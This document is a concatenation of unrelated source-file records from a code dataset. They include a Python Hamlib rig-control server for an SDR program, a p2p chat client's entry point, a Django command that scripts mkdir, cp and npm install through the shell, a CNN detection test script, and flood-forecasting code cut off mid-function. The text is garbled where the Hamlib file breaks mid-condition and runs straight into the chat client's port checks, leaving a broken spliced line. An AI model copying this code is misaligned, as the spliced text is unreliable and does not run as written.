\"0 0\\n\",\n \"0 0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"0\\n\",\n \"\\n\",\n \"\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n \"0x0\\n\",\n\"0x0\\n\",\n \"0\\n\",\n])\n\n\n# This class is created for each connection to the server. It services requests from each client\nclass HamlibHandler:\n \n SingleLetters = {\t\t# convert single-letter commands to long commands\n 'f':'freq',\n 'm':'mode',\n 't':'ptt',\n 'v':'vfo',\n 's':'split',\n 'w':'command',\n 'y':'ant',\n '_':'info',\n '1':'caps',\n 'q':'quit',\n }\n \n def __init__(self, app, sock, address):\n self.app = app\t\t# Reference back to the \"hardware\"\n self.sock = sock\n sock.settimeout(0.5)\n self.address = address\n self.received = ''\n self.P = self.app.P\n self.modeB = None\n self.VERBOSITY = DEFAULT_VERBOSITY\n \n h = self.Handlers = {}\n h[''] = self.ErrProtocol\n h['dump_state']\t= self.DumpState\n h['get_caps']\t= self.GetCaps\n h['get_freq']\t= self.GetFreq\n h['set_freq']\t= self.SetFreq\n h['get_mode']\t= self.GetMode\n h['set_mode']\t= self.SetMode\n h['chk_vfo']\t= self.ChkVfo\n h['get_vfo']\t= self.GetVfo\n h['set_vfo']\t= self.SetVfo\n h['get_split']\t= self.GetSplit\n h['get_ptt']\t= self.GetPtt\n h['set_ptt']\t= self.SetPtt\n h['get_ant']\t= self.GetAnt\n h['set_ant']\t= self.SetAnt\n h['get_command']\t= self.GetCommand\n #h['set_command']\t= self.SendCommand\n h['get_info']\t= self.GetInfo\n h['set_info']\t= self.GetInfo\n h['get_quit']\t= self.Quit\n h['set_quit']\t= self.Quit\n h['get_function']\t= self.GetFunction\n h['set_function']\t= self.SetFunction\n\n if self.app.port==4675 and False:\n self.VERBOSITY = 2\n \n \n # Send text back to the client\n def Send(self, text):\n try:\n if type(text) is list:\n text='\\n'.join(text)\n self.sock.sendall(text.encode())\n except socket.error:\n print('HAMLIB_SERVER: SEND: Socket error - closing socket')\n self.sock.close()\n self.sock = None\n \n # Create a string reply of name, value pairs, and an ending integer code.\n def Reply(self, *args):\t # args is name, value, name, value, ..., int\n if self.extended:\n # Use extended format\n t = \"%s:\" % self.cmd\t\t# Extended format echoes the command and parameters\n for param in self.params:\n t = \"%s %s\" % (t, param)\n t += self.extended\n for i in range(0, len(args) - 1, 2):\n t = \"%s%s: %s%c\" % (t, args[i], args[i+1], self.extended)\n t += \"RPRT A %d\\n\" % args[-1]\n #print('HAMLIB_SERVER: Reply A - t=',t)\n \n elif len(args) > 1:\n # Use simple format\n t = ''\n for i in range(1, len(args) - 1, 2):\n #print(i,args[i])\n t = \"%s%s\\n\" % (t, args[i])\n #print('HAMLIB_SERVER: Reply B - t=',t)\n \n else:\n # No names; just the required integer code\n t = \"RPRT C %d\\n\" % args[0]\n #print('HAMLIB_SERVER: Reply C - t=',t)\n \n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: REPLY:',t.rstrip(),'on port',self.app.port)\n self.Send(t)\n \n # Invalid parameter\n def ErrParam(self):\n if self.VERBOSITY>0:\n print('HAMLIB_SERVER: Invalid Param on port',self.app.port)\n #sys.exit(0)\n self.Reply(-1)\n \n # Command not implemented\n def UnImplemented(self):\n self.cmd2=''\n if self.VERBOSITY>0 or True:\n print('*** ERROR *** HAMLIB_SERVER: Unimplemented command:',self.cmd,'on port',self.app.port)\n #sys.exit(0)\n self.Reply(-4)\n \n # Protocol error\n def ErrProtocol(self):\n if self.VERBOSITY>0:\n print('HAMLIB_SERVER: Invalid protocal on port',self.app.port)\n #sys.exit(0)\n self.Reply(-8)\n \n # main processing loop that reads and satisfies requests.\n def Process(self):\n if not self.sock:\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: NULL SOCKET on port',self.app.port)\n return 0\n \n # Read any data from the socket\n try:\n text = self.sock.recv(1024).decode(\"utf-8\") \n except socket.timeout:\t# This does not work\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: Socket timeout on port',self.app.port)\n except socket.error:\t# Nothing to read\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: Socket error on port',self.app.port)\n else:\t\t\t\t\t# We got some characters\n self.received += text\n if self.VERBOSITY>=2:\n print('HAMLIB_SERVER: Process: text=',text.rstrip(),' on port',self.app.port)\n \n if '\\n' in self.received:\t# A complete command ending with newline is available\n cmd, self.received = self.received.split('\\n', 1)\t# Split off the command, save any further characters\n else:\n return 1\n cmd = cmd.strip()\t\t# Here is our command\n self.cmd=cmd\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Got command', cmd,'on port',self.app.port)\n \n # ??? Indicates a closed connection?\n if not cmd:\n print('HAMLIB_SERVER: Empty command :-(')\n self.sock.close()\n self.sock = None\n return 0\n \n # Parse the command and call the appropriate handler\n if cmd[0] == '+':\t\t\t# rigctld Extended Response Protocol\n self.extended = '\\n'\n cmd = cmd[1:].strip()\n elif cmd[0] in ';|,':\t\t# rigctld Extended Response Protocol\n self.extended = cmd[0]\n cmd = cmd[1:].strip()\n else:\n self.extended = None\n\n if cmd[0:1] == '\\\\':\t\t# long form command starting with backslash\n args = cmd[1:].split()\n self.cmd = args[0]\n self.params = args[1:]\n self.Handlers.get(self.cmd, self.UnImplemented)()\n else:\n\n #### Handle compound commands, e.g. M USB 0 X USB 0 #####\n # Need to flush out how individual command strip off args - see SetMode\n # Also need to add handlers for 'X' and 'I'\n self.cmd2=''\n Done=False\n while not Done:\n \n # single-letter command\n self.params = cmd[1:].strip()\n cmd = cmd[0:1]\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd=',cmd)\n try:\n t = self.SingleLetters[cmd.lower()]\n except KeyError:\n print('HAMLIB_SERVER: KeyError')\n Done=True\n self.cmd=cmd\n self.UnImplemented()\n else:\n #if cmd in string.uppercase:\n if cmd.isupper():\n self.cmd = 'set_' + t\n else:\n self.cmd = 'get_' + t\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd1=',self.cmd)\n self.Handlers.get(self.cmd, self.UnImplemented)()\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: cmd2=',self.cmd2)\n\n if len(self.cmd2)==0:\n Done=True\n else:\n # Done=True\n cmd = self.cmd2\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Process: Try again, cmd=',cmd)\n\n return 1\n \n # These are the handlers for each request\n def DumpState(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Dump State on port',self.app.port)\n self.Send(dump2)\n\n def GetCaps(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Caps on port',self.app.port)\n #caps=['Model name:\\tFT-2000', 'Mfg name:\\tYaesu']\n caps=['Model name:\\tpySDR', 'Mfg name:\\tAA2IL']\n self.Send(caps)\n\n # Routine to associate SDR RX number and RIG VFO with a prot number\n def port2rx(self):\n port = self.app.port\n if port==4532 or port==4632 or port==4732:\n irx = 0\n vfo='A'\n elif port==4533 or port==4633 or port==4733:\n irx = 0\n vfo='B'\n elif port>=4675:\n irx = port - 4675\n vfo='B'\n else:\n irx = port - 4575\n vfo='A'\n\n return [irx,vfo]\n\n # Return current freq\n def GetFreq(self):\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER: GetFreq:',self.app.port,irx,vfo)\n if self.P.SO2V:\n frq=self.P.sock.get_freq(vfo)\n self.Reply('Frequency', int(frq+0.5) , 0)\n elif self.P.NUM_RX==0:\n frq=self.P.sock.freq # *1e3\n self.Reply('Frequency', int(frq+0.5) , 0)\n else:\n self.app.freq = int( self.P.FC[irx] + 0.5)\n #print(self.P.FC)\n #print(self.P.FC[irx])\n self.Reply('Frequency', self.app.freq, 0)\n else:\n #print('HAMLIB_SERVER: GetFreq', self.app.freq)\n self.Reply('Frequency', self.app.freq, 0)\n\n # Set freq\n def SetFreq(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: SetFreq',self.params,'on port',self.app.port)\n try:\n x = float(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n x = int(x + 0.5)\n self.app.freq = x\n\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER:.SetFreq: ============================ port=',self.app.port,'/t rx=',irx,'/t frq=',x)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetFreq:',irx,vfo,x)\n self.P.sock.set_freq(x*1e-3,vfo)\n else:\n self.P.NEW_FREQ[irx] = x\n self.P.VFO[irx] = vfo\n self.P.FREQ_CHANGE = True\n\n # Return current mode\n def GetMode(self):\n #print('HAMLIB_SERVER: GetMode on port',self.app.port,self.P.SO2V)\n if self.P.SO2V:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER: GetMode:',irx,vfo)\n if vfo=='A':\n rig_mode = self.P.sock.get_mode(vfo)\n else:\n if not self.modeB:\n rig_mode = self.P.sock.get_mode(vfo)\n self.modeB = rig_mode\n rig_mode = self.modeB\n #print('HAMLIB_SERVER: GetMode:',irx,vfo,rig_mode)\n self.Reply('Mode', rig_mode, 'Passband', self.app.bandwidth, 0)\n elif self.P.NUM_RX==0:\n rig_mode = self.P.sock.mode\n self.Reply('Mode', rig_mode, 'Passband', self.app.bandwidth, 0)\n else:\n self.Reply('Mode', self.app.mode, 'Passband', self.app.bandwidth, 0)\n \n # Set mode\n def SetMode(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: SetMode',self.params,'on port',self.app.port)\n try:\n #mode, bw = self.params.split()\n a=self.params.split()\n if len(a)==1:\n # NONE mode from FLDIGI is mapped to IQ\n mode = 'IQ'\n bw = a[0]\n else:\n mode = a[0]\n bw = a[1]\n if len(a)>2:\n self.cmd2=' '.join(a[2:])\n \n bw = int(float(bw) + 0.5)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n self.app.mode = mode\n self.app.bandwidth = bw\n\n if self.P:\n [irx,vfo] = self.port2rx()\n #print('HAMLIB_SERVER:.SetMode: ============================ port=',self.app.port,'/t mode/bw=',mode,bw)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetMode: mode/irx/vfo=',mode,irx,vfo)\n self.P.sock.set_mode(mode,vfo)\n if vfo=='B':\n self.modeB=mode\n else:\n self.P.NEW_MODE = mode\n self.P.MODE_CHANGE = True\n #print('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ NEED to ADD CODE to SET BANDWIDTH **********************\\n')\n\n # Check VFO\n def ChkVfo(self):\n print('HAMLIB_SERVER: Chk VFO on port',self.app.port)\n self.Reply('CHKVFO', 0, 0)\n \n # Return current VFO\n def GetVfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get VFO on port',self.app.port)\n [irx,vfo] = self.port2rx()\n self.app.vfo = \"VFO\"+vfo\n self.Reply('VFO', self.app.vfo, 0)\n \n # Set current VFO\n def SetVfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set VFO on port',self.app.port)\n try:\n x = self.params\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n self.app.vfo = \"VFO\"+x\n\n if self.P:\n [irx,vfo] = self.port2rx()\n print('HAMLIB_SERVER:.SetVfo: ============================ port=',self.app.port,'/t rx=',irx,'/t vfo=',vfo)\n if self.P.SO2V or self.P.NUM_RX==0:\n print('HAMLIB_SERVER: SetVfo:',irx,vfo,x)\n self.P.sock.set_vfo(x)\n else:\n self.P.VFO[irx] = x\n \n # Return split state\n def GetSplit(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get SPLIT on port',self.app.port)\n print('HAMLIB_SERVER: *** Get Split is NOT FULLY IMPLEMENTED ***')\n [irx,vfo] = self.port2rx()\n self.app.tx_vfo = \"VFO\"+vfo\n #self.app.tx_vfo = \"VFOA\"\n self.Reply('Split', self.app.split, 'TX VFO',self.app.tx_vfo,0)\n\n # Receive a direct command \n def GetCommand(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: GET COMMAND: cmd=',self.cmd,self.params)\n\n cmds = self.params.split(';')\n #print('cmds=',cmds)\n for cmd in cmds:\n #print('cmd=',cmd,len(cmd))\n\n # Special command for SDR - Audio Recorder on/off\n if len(cmd)==3 and cmd=='REC':\n #print('Recorder setting?')\n resp = 'REC'+str(self.app.record)+';'\n elif len(cmd)==4 and (cmd=='REC0' or cmd=='REC1'):\n #print('Recorder set')\n self.app.record=int(cmd[3])\n #resp = 'REC'+str(self.app.record)+';'\n resp=None\n if self.P:\n self.P.gui.StartStopSave_Demod(iopt=self.app.record)\n else:\n resp=-1\n \n if resp:\n self.Reply('Cmd',resp,0)\n \n # Send a command directly to the rig\n def SendCommand(self):\n print('HAMLIB_SERVER: SEND COMMAND: cmd=',self.cmd,self.params)\n print('This is not fully implemented yet')\n \n # Return rig info\n def GetInfo(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Info on port',self.app.port)\n if self.P and hasattr(self.P,'sock'):\n info=self.P.sock.get_info()\n self.Reply('Info', info, 0)\n print('HAMLIB_SERVER: Get Info info=',info)\n else:\n self.Reply('Info', self.app.info, 0)\n \n # Return current antenna\n def GetAnt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get Ant on port',self.app.port)\n if self.P:\n ant=self.P.sock.get_ant()\n self.Reply('Ant', 'ANT'+str(ant), 0)\n else:\n self.Reply('Ant', 'ANT'+str(self.app.ant), 0)\n \n # Set antenna port\n def SetAnt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set Ant',self.params,'on port',self.app.port)\n print('HAMLIB_SERVER: Set Ant:',self.P.sock.connection)\n if self.P:\n ant=int(self.params)\n print('HAMLIB_SERVER: Set Ant:',ant)\n #if P.sock.connection=='DIRECT':\n self.P.sock.set_ant(ant+1)\n self.Reply(0)\n \n # Return current PTT state\n def GetPtt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Get PTT on port',self.app.port)\n self.Reply('PTT', self.app.ptt, 0)\n \n # Set PPT\n def SetPtt(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: Set PTT',self.params,'on port',self.app.port)\n \n try:\n x = int(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n print('x=',x)\n if x:\n self.app.ptt = 1\n else:\n self.app.ptt = 0\n if self.P:\n [irx,vfo] = self.port2rx()\n print('irx/vfo=',irx,vfo)\n self.P.sock.ptt(self.app.ptt,vfo)\n else:\n print('No P!')\n\n # Return current function state\n def GetFunction(self):\n if self.VERBOSITY>=1 or True:\n print('HAMLIB_SERVER: Get Function on port',self.app.port)\n self.Reply('RECORD', self.app.record, 0)\n \n # Set Record\n def SetFunction(self):\n if self.VERBOSITY>=1 or True:\n print('HAMLIB_SERVER: Set Function',self.params,'on port',self.app.port)\n \n try:\n x = int(self.params)\n self.Reply(0)\n except:\n self.ErrParam()\n else:\n print('x=',x)\n if x:\n self.app.record = 1\n else:\n self.app.record = 0\n\n \n # No-op - ignore command\n def NoOp(self):\n if self.VERBOSITY>=1:\n print('HAMLIB_SERVER: No-op on port',self.app.port)\n\n def set_verbosity(self,verbosity):\n self.VERBOSITY=verbosity\n print('HAMLIB_SERVER: Setting verbosity to',self.VERBOSITY,'on port',self.app.port)\n\n def Quit(self):\n print('HAMLIB_SERVER: Quitting on port',self.app.port)\n self.sock.close()\n self.sock = None\n \n def Exit(self):\n print('HAMLIB_SERVER: Exitting on port',self.app.port)\n sys.exit(0)\n\n \n# This is the main application class. It listens for connectons from clients and creates a server for each one.\nclass HamlibServer:\n \n def __init__(self,P=None,port=4575,verbosity=DEFAULT_VERBOSITY):\n print('@@@@@@@@@@@@@@ HAMLIB_SERVER:SERVER Init',port)\n self.port = port\n self.P=P\n self.hamlib_clients = []\n self.VERBOSITY=verbosity\n \n # This is the state of the \"hardware\"\n self.freq = 29999999\n self.mode = 'CW'\n self.bandwidth = 2400\n self.vfo = \"VFOA\"\n self.ptt = 0\n self.record = 0\n self.split = 0\n self.tx_vfo = 'VFOA'\n self.ant = 0\n self.info = 'UNKNOWN'\n\n self.hamlib_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.hamlib_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n print(('localhost', port))\n self.hamlib_socket.bind(('localhost', port))\n self.hamlib_socket.settimeout(0.1)\n self.hamlib_socket.listen(5)\n #self.hamlib_socket.setblocking(False)\n\n # Spawn thread to look for new connection\n print('@@@@@@@@@@@@@@@@@@@@@@@ Spawning accepter',port)\n self.worker = threading.Thread(target=self.Accepter, args=(),name='Accepter '+str(port))\n self.worker.setDaemon(True)\n self.worker.start()\n self.accepter_running = True\n \n def Accepter(self):\n print('@!@!@!@!@!@!@! Acceptor started on port',self.port)\n\n while not self.P.Stopper.isSet():\n time.sleep(1.)\n self.check_connections()\n\n print('@!@!@!@!@!@!@! Acceptor ended on port',self.port)\n self.accepter_running = False\n\n def Run(self):\n self.connected=False\n\n print('HAMLIB_SERVER:SERVER Running on port',self.port)\n\n while not self.P.Stopper.isSet():\n #print('HAMLIB_SERVER: Running on port',self.port)\n \n while not self.connected and not self.P.Stopper.isSet():\n #print('HAMLIB_SERVER: Waiting for connection on port',self.port)\n time.sleep(1.)\n #self.check_connections()\n\n n=0\n while self.connected and not self.P.Stopper.isSet():\n time.sleep(.05)\n\n # Check for any new connections\n #n+=1\n #if n>=20:\n # n=0\n # self.check_connections()\n \n # Check if connections are still alive\n for client in self.hamlib_clients:\n ret = client.Process()\n if self.VERBOSITY>=2:\n print('\\nHAMLIB_SERVER: Checking client',client,ret,self.port)\n\n\t # False return indicates a closed connection; remove the server\n if not ret:\n self.hamlib_clients.remove(client)\n print('HAMLIB_SERVER: Removed', client.address)\n self.connected=False\n\n print('HAMLIB_SERVER: waiting for accepeter to stop on port',self.port,' ...')\n while self.accepter_running:\n time.sleep(0.1)\n print('HAMLIB_SERVER: waiting for clients to stop on port',self.port,' ...')\n for client in self.hamlib_clients:\n client.Quit()\n print('HAMLIB_SERVER: Exited on port',self.port)\n\n\n # Function to check for new connections\n def check_connections(self):\n P=self.P\n #print('!@#$%^&*()*&^%$#@$%^&*()*&^%$ HAMLIB_SERVER:SERVER: Checking for new connections ...',self.port)\n\n # Update freq & mode info\n if not P.SO2V or self.P.NUM_RX==0:\n #print(\"P=\",pprint(vars(self.P)))\n port = self.port\n if port==4532 or port==4533 or port==4632 or port==4633 or port==4732 or port==4733:\n irx = 0\n elif port>=4675:\n irx = port - 4675\n else:\n irx = port - 4575\n if irx>=0 and irx65535:\r\n print(\"Invalid port %d.\" %args.port)\r\n return\r\n \r\n if args.entrypoint>65535:\r\n print(\"Invalid local port %d.\" %args.entrypoint)\r\n return\r\n \r\n try:\r\n fp = open(args.key_database, \"a+\") #Creates file if it doesn't exist\r\n if(fp.tell() == 0):\r\n fp.write(\"{}\") #A new empty json database\r\n fp.close()\r\n except IOError:\r\n print(\"Invalid key database %s.\" %args.key_database)\r\n return\r\n \r\n try:\r\n fp = open(args.key_file, \"ab+\") #Creates file if it doesnt exist\r\n if(fp.tell() == 0):\r\n fp.write( X25519PrivateKey.generate().private_bytes(Encoding.Raw,PrivateFormat.Raw,NoEncryption()) )\r\n fp.close()\r\n P2PChatConnection.private_key_file = args.key_file\r\n except IOError:\r\n print(\"Invalid key file %s.\" %args.key_file)\r\n return\r\n \r\n if args.new and args.entrypoint<0:\r\n print(\"Can't start a new chat without an entrypoint; please specify port\")\r\n return\r\n \r\n #Everything is good at this point, start the class\r\n \r\n con = P2PChat(args.entrypoint,args.key_database,args.key_file,PromptUI)\r\n if args.new:\r\n con.createNewRoom()\r\n else:\r\n con.connect(args.ip,args.port)\r\n","repo_name":"marc-weber1/p2pirc","sub_path":"p2pirc/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20534929255","text":"import subprocess\nimport os\nimport sys\nimport site\nfrom django.core.management.templates import TemplateCommand\n\n\ndef windows_dir(source, app_name):\n files_dir = f'''\n mkdir {app_name}\\react\n mkdir -p {app_name}\\templates\\{app_name}\\\\\n mkdir -p {app_name}\\static\\{app_name}\\css\\\\\n mkdir -p {app_name}\\static\\{app_name}\\images\\\\\n cp -a {source}\\react\\. {app_name}\\react\\\\\n cp -a {source}\\templates\\*.html {app_name}\\templates\\\\\n cp -a {source}\\templates\\reactify\\*.html {app_name}\\templates\\{app_name}\\\\\n cp -a {source}\\static\\. {app_name}\\static\\\\\n cp -a {source}\\static\\js\\. {app_name}\\static\\js\\\\\n cp -a {source}\\static\\css\\*.css {app_name}\\static\\{app_name}\\css\\\\\n cp -a {source}\\static\\images\\. {app_name}\\static\\{app_name}\\images\\\\\n cp -a {source}\\*.json {app_name}\\\\\n cp -a {source}\\*.js {app_name}\\\\\n '''\n return files_dir\n\n\ndef mac_dir(source, app_name):\n files_dir = f'''\n mkdir {app_name}/react\n mkdir -p {app_name}/templates/{app_name}/\n mkdir -p {app_name}/static/{app_name}/css/\n mkdir -p {app_name}/static/{app_name}/images/\n cp -a {source}/react/. {app_name}/react/\n cp -a {source}/templates/*.html {app_name}/templates/\n cp -a {source}/templates/reactify/*.html {app_name}/templates/{app_name}/\n cp -a {source}/static/. {app_name}/static/\n cp -a {source}/static/js/. {app_name}/static/js/\n cp -a {source}/static/css/*.css {app_name}/static/{app_name}/css/\n cp -a {source}/static/images/. {app_name}/static/{app_name}/images/\n cp -a {source}/*.json {app_name}/\n cp -a {source}/*.js {app_name}/\n '''\n return files_dir\n\nclass Command(TemplateCommand):\n help = 'Create Django app with React templates'\n\n def handle(self, **options):\n app_name = options.pop('name')\n packages = site.getsitepackages()\n\n if len(packages) > 0:\n if sys.platform.startswith('win'):\n source = f'{packages[0]}\\reactify'\n self.generate_react_packages(source, app_name, 'WIN')\n elif sys.platform.startswith('linu'):\n source = f'{packages[0]}/reactify'\n self.generate_react_packages(source, app_name, 'LIN')\n else:\n source = f'{packages[0]}/reactify'\n self.generate_react_packages(source, app_name, 'MAC')\n\n\n def generate_react_packages(self, source, app_name, platform):\n\n try:\n subprocess.run(\n self.react_package_directory(source, app_name, platform),\n shell=True,\n check=True,\n executable='/bin/bash'\n )\n except subprocess.CalledProcessError:\n pass\n\n\n def react_package_directory(self, source, app_name, platform):\n platform_dirs = {\n 'MAC': mac_dir(source, app_name),\n 'LIN': mac_dir(source, app_name),\n 'WIN': windows_dir(source, app_name)\n }\n\n return platform_dirs[platform] + self.install_packages(app_name)\n\n\n def install_packages(self, app_name):\n command_string = f'''\n cd {app_name}\n echo \"Installing react packages...\"\n npm install\n echo \" \"\n echo \"cd {app_name} and run:\"\n echo \" npm run dev\"\n echo \" \"\n echo \"Happy coding 😄!\"\n echo \" \"\n '''\n\n return command_string\n","repo_name":"Bonifase/django-reactify","sub_path":"reactify/management/commands/reactify.py","file_name":"reactify.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"3978778257","text":"import sys; print('Python %s on %s' % (sys.version, sys.platform))\nsys.path.extend(['C:\\\\Users\\\\Administrator\\\\Desktop\\\\detection', 'C:/Users/Administrator/Desktop/detection'])\nfrom CNN.室内物体检测.training.室内物体识别训练 import *\n# tf_x=tf.placeholder(tf.float32,[None,768,768,3])\nsess.run([tf.global_variables_initializer(),tf.local_variables_initializer()])\n#重载sess\nget_model(sess)\n#停止更新\ntf.stop_gradient(accuray)\ntf.stop_gradient(conv1)\ntf.stop_gradient(conv2)\ntf.stop_gradient(l1)\ntf.stop_gradient(conv3)\ntf.stop_gradient(conv4)\ntf.stop_gradient(conv5)\n\n# tf_x=tf.placeholder(tf.float32,[None,768,768,3])\n\ndef load_test_img(test_img_path=r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\1.jpg'):\n image=cv2.imread(test_img_path)#获取测试图片\n\n return image\n\n#只是用一张图片来进行验证\ndef check(image):\n global sess\n image_cover=image[np.newaxis,:,:,:].astype(np.float32)\n print(image_cover.shape)\n result=sess.run(conv5,{tf_x: image_cover})\n result_grid=result.argmax(axis=3)[0]\n result_grid1 = result.max(axis=3)[0]\n print(\"检测完成\",result[0].shape,'\\n',result_grid,'\\n',result_grid1)\n return result,result_grid,result_grid1\n\ndef resize(image,shape=(448,448)):\n image_resize=cv2.resize(image, shape)\n cv2.imshow(\"image\", image_resize)\n cv2.waitKey(1000)\n return image_resize\n\nif __name__==\"__main__\":\n path1=r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\1.jpg'\n path2 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\2.jpg'\n path3 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\3.jpg'\n path4 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\4.jpg'\n path5 = r'C:\\Users\\Administrator\\Desktop\\datasets\\test_images\\5.jpg'\n\n image=load_test_img(path4)\n image_resize=resize(image,shape=(1024,1024))/255.0\n image_resize=image_resize.astype(np.float32)\n print('image_resize',image_resize.shape)\n result,result_grid,result_grid1=check(image_resize)\n\n x=[]\n y=[]\n c=[]\n for i in range(result_grid.shape[0]):\n for j in range(result_grid.shape[1]):\n x.append(i)\n y.append(j)\n c.append(result_grid[i,j])\n\n import matplotlib.pyplot as plt\n plt.scatter(x,y,c=c)\n plt.show()\n\n","repo_name":"msdnqqy/detection","sub_path":"CNN/室内物体检测/使用/using_new.py","file_name":"using_new.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"6806775184","text":"import os\nimport numpy as np\nimport datetime as dt\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n#import joblib\nfrom sklearn.pipeline import Pipeline\n#from dask_ml.preprocessing import StandardScaler\n#from dask_ml.decomposition import PCA\n\n#from dask_ml.xgboost import XGBRegressor\n#from dask_ml.linear_model import LogisticRegression\n#from dask_ml.linear_model import LinearRegression\n#from sklearn.linear_model import Ridge\n\nimport h5py\nimport keras\nfrom keras.layers.core import Dropout\n\nimport geopandas\nfrom rasterio import features\nfrom affine import Affine\n\nimport dask\n#import dask.multiprocessing\ndask.config.set(scheduler='threads')\n\nimport xarray as xr\nfrom dask.diagnostics import ProgressBar\n\nimport sys\nprint(sys.executable)\n\ndef sfloat(f):\n return str(float(f))\ndef sint(i):\n return str(int(i))\n\ndef read_glofas_danube():\n glofas = xr.open_dataset('../data/danube/glofas_reanalysis_danube_1981-2002.nc')\n glofas = glofas.rename({'lat': 'latitude', 'lon': 'longitude'}) # to have the same name like in era5\n glofas = shift_time(glofas, -dt.timedelta(days=1)) # the discharge is the mean of the previous 24h of the timestamp\n return glofas\n\ndef shift_time(ds, value):\n ds.coords['time'].values = pd.to_datetime(ds.coords['time'].values) + value\n return ds\n\ndef select_riverpoints(glofas):\n return (glofas['dis'] > 5)\n\ndef get_mask_of_basin(da, kw_basins='Danube'):\n \"\"\"\n Parameters:\n -----------\n da : xr.DataArray\n contains the coordinates\n kw_basins : str\n identifier of the basin in the basins dataset\n \"\"\"\n def transform_from_latlon(lat, lon):\n lat = np.asarray(lat)\n lon = np.asarray(lon)\n trans = Affine.translation(lon[0], lat[0])\n scale = Affine.scale(lon[1] - lon[0], lat[1] - lat[0])\n return trans * scale\n\n def rasterize(shapes, coords, fill=np.nan, **kwargs):\n \"\"\"Rasterize a list of (geometry, fill_value) tuples onto the given\n xray coordinates. This only works for 1d latitude and longitude\n arrays.\n \"\"\"\n transform = transform_from_latlon(coords['latitude'], coords['longitude'])\n out_shape = (len(coords['latitude']), len(coords['longitude']))\n raster = features.rasterize(shapes, out_shape=out_shape,\n fill=fill, transform=transform,\n dtype=float, **kwargs)\n return xr.DataArray(raster, coords=coords, dims=('latitude', 'longitude'))\n \n # this shapefile is from natural earth data\n # http://www.naturalearthdata.com/downloads/10m-cultural-vectors/10m-admin-1-states-provinces/\n shp2 = '/raid/home/srvx7/lehre/users/a1303583/ipython/ml_flood/data/drainage_basins/Major_Basins_of_the_World.shp'\n basins = geopandas.read_file(shp2)\n# print(basins)\n single_basin = basins.query(\"NAME == '\"+kw_basins+\"'\").reset_index(drop=True)\n# print(single_basin)\n shapes = [(shape, n) for n, shape in enumerate(single_basin.geometry)]\n\n da['basins'] = rasterize(shapes, da.coords)\n da = da.basins == 0\n return da.drop('basins')\n \ndef select_upstream(glofas, lat, lon, basin='Danube'):\n dis_box_mean = glofas['dis'].mean('time')\n da = dis_box_mean\n \n # longitude condition\n is_west = (~np.isnan(dis_box_mean.where(dis_box_mean.longitude <= lon))).astype(bool)\n\n river_min_discharge = 20\n # mask_box_mean_greater = dis_box_mean > river_min_discharge\n mask_box_mean_greater = (~np.isnan(dis_box_mean.where(dis_box_mean > river_min_discharge))).astype(bool)\n \n mask_basin = get_mask_of_basin(dis_box_mean, kw_basins=basin)\n #mask_basin = ~np.isnan(tmp).astype(bool)\n \n #dlat = dis_box_mean.latitude[1]-dis_box_mean.latitude[0]\n #dlon = dis_box_mean.longitude[1]-dis_box_mean.longitude[0]\n nearby_mask = dis_box_mean*0.\n nearby_mask.loc[dict(latitude=slice(lat+1.5, lat-1.5), \n longitude=slice(lon-1.5, lon+1.5))] = 1.\n nearby_mask = nearby_mask.astype(bool)\n #plt.imshow(nearby_mask.astype(int))\n #plt.show()\n \n mask = mask_box_mean_greater & mask_basin & nearby_mask & is_west\n if 'basins' in mask.coords:\n mask = mask.drop('basins')\n if 'time' in mask.coords:\n mask = 